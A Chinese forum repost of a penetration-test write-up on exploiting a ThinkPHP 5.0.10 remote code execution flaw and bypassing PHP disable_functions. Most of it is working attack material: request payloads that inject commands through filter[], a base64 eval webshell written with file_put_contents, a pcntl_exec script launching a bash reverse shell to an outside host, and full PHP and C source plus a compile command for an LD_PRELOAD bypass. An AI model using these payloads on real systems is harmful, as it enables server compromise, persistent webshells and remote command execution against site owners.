设为首页收藏本站

安徽论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 9547|回复: 0

一次项目中Thinkphp绕过禁用函数的实战记录

[复制链接]

90

主题

865

回帖

1576

积分

金牌会员

Rank: 6Rank: 6

积分
1576
发表于 2022-3-26 10:58:42 | 显示全部楼层 |阅读模式
网站内容均来自网络,本站只提供信息平台,如有侵权请联系删除,谢谢!
目录


前言

在一次渗透测试中,手工找了许久没发现什么东西,抱着尝试的心情打开了xray
果然xray还是挺给力的,一打开网页的时候xray直接就扫描出了thinkphp 5.0.10 rce漏洞
直接使用命令执行payload,结果报出system函数被禁用
  1. s=whoami&_method=__construct&method=&filter[]=system
复制代码

尝试应用其他函数进行利用,经过测试发现call_user_func函数没有被禁用
Payload
  1. s=phpinfo&_method=__construct&method=get&filter[]=call_user_func
复制代码
可以看到哪些函数被禁用了

看到assert和include没有被禁用,一开始想写shell进日志然后去利用文件包含,发现并没有任何反应,也不报错。

file_put_contents


又回去看被禁用的函数,发现文件函数没被禁用,可以用file_put_contents函数去写文件
测试写入phpinfo文件
  1. s=file_put_contents('/www/wwwroot/public/phpinfo.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWydhYWFhJ107ZXZhbCgkcGFzcyk7Pz4'))&_method=__construct&filter=assert
复制代码

写入成功

写入冰蝎马可以进行文件管理了

虽然可以进行文件操作了,但还是没法执行命令


pcntl_exec


想到了比较容易被忽略的命令执行函数pcntl_exec,发现pcntl_exec函数没有被禁用,该函数可以指定一个程序来执行指定文件
先写一个exe.php文件,在文件中指定pcntl_exec的参数(执行运行程序,运行指定文件)
  1. <?php
  2.     switch (pcntl_fork()) {
  3.         case 0:
  4.             pcntl_exec('/bin/bash', ['/www/wwwroot/public/exec.sh']);
  5.             exit(0);
  6.         default:
  7.             break;
  8.     }
  9. ?>
复制代码
exec.sh文件写入反弹命令
  1. bash -i >& /dev/tcp/vpsip/7777 0>&1
复制代码
浏览器访问exe.php成功反弹shell


LD_PRELOAD 劫持


这次渗透是结束了,这里尝试了另外一种绕过方法,如果遇到pcntl_exec函数也被禁用的情况,可以利用环境变量 LD_PRELOAD 劫持系统函数,让外部程序加载恶意 *.so,达到执行系统命令的效果。详细的原理介绍就不赘述了,可以参考这个大哥的文章https://www.meetsec.cn/index.php/archives/44/
这种方法主要是需要上传一个.php和一个由.c程序编译得到共享对象.so文件到服务器
bypass_disablefunc.php
  1. <?php
  2.     echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";

  3.     $cmd = $_GET["cmd"];
  4.     $out_path = $_GET["outpath"];
  5.     $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
  6.     echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";

  7.     putenv("EVIL_CMDLINE=" . $evil_cmdline);

  8.     $so_path = $_GET["sopath"];
  9.     putenv("LD_PRELOAD=" . $so_path);

  10.     mail("", "", "", "");

  11.     echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";

  12.     unlink($out_path);
  13. ?>
复制代码
bypass_disablefunc.php提供了三个参数:
       
  • cmd 参数,待执行的系统命令(如 whoami)。   
  • outpath 参数,保存命令执行输出结果的文件路径(如 /www/wwwroot/public),便于在页面上显示,另外关于该参数,你应注意 web 是否有读写权限、web 是否可跨目录访问、文件将被覆盖和删除等几点。   
  • sopath 参数,指定劫持系统函数的共享对象的绝对路径(如 /www/wwwroot/bypass_disablefunc_x64.so),另外关于该参数,你应注意 web 是否可跨目录访问到它,最好也传到web根目录下。
bypass_disablefunc.c
  1. #define _GNU_SOURCE

  2. #include <stdlib.h>
  3. #include <stdio.h>
  4. #include <string.h>


  5. extern char** environ;

  6. __attribute__ ((__constructor__)) void preload (void)
  7. {
  8.     // get command line options and arg
  9.     const char* cmdline = getenv("EVIL_CMDLINE");

  10.     // unset environment variable LD_PRELOAD.
  11.     // unsetenv("LD_PRELOAD") no effect on some
  12.     // distribution (e.g., centos), I need crafty trick.
  13.     int i;
  14.     for (i = 0; environ[i]; ++i) {
  15.             if (strstr(environ[i], "LD_PRELOAD")) {
  16.                     environ[i][0] = '\0';
  17.             }
  18.     }

  19.     // executive command
  20.     system(cmdline);
  21. }
复制代码
这里需要用命令gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so将 bypass_disablefunc.c编译为共享对象 bypass_disablefunc_x64.so
要根据目标架构编译成不同版本,在 x64 的环境中编译,若不带编译选项则默认为 x64,若要编译成 x86 架构需要加上 -m32 选项。
可以在github上找到上述需要的文件
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
这里利用之前的文件管理冰蝎shell将php和so文件上传到服务器web目录
在浏览器访问bypass_disablefunc.php传入参数
  1. http://www.xxx.com/bypass_disablefunc.php?cmd=ls&outpath=/www/wwwroot%20/public/1.txt&sopath=/www/wwwroot/public/bypass_disablefunc_x64.so
复制代码
成功执行命令


总结

到此这篇关于一次项目中Thinkphp绕过禁用函数的文章就介绍到这了,更多相关Thinkphp绕过禁用函数内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
                                                        
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
免责声明
1. 本论坛所提供的信息均来自网络,本网站只提供平台服务,所有账号发表的言论与本网站无关。
2. 其他单位或个人在使用、转载或引用本文时,必须事先获得该帖子作者和本人的同意。
3. 本帖部分内容转载自其他媒体,但并不代表本人赞同其观点和对其真实性负责。
4. 如有侵权,请立即联系,本网站将及时删除相关内容。
懒得打字嘛,点击右侧快捷回复 【右侧内容,后台自定义】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表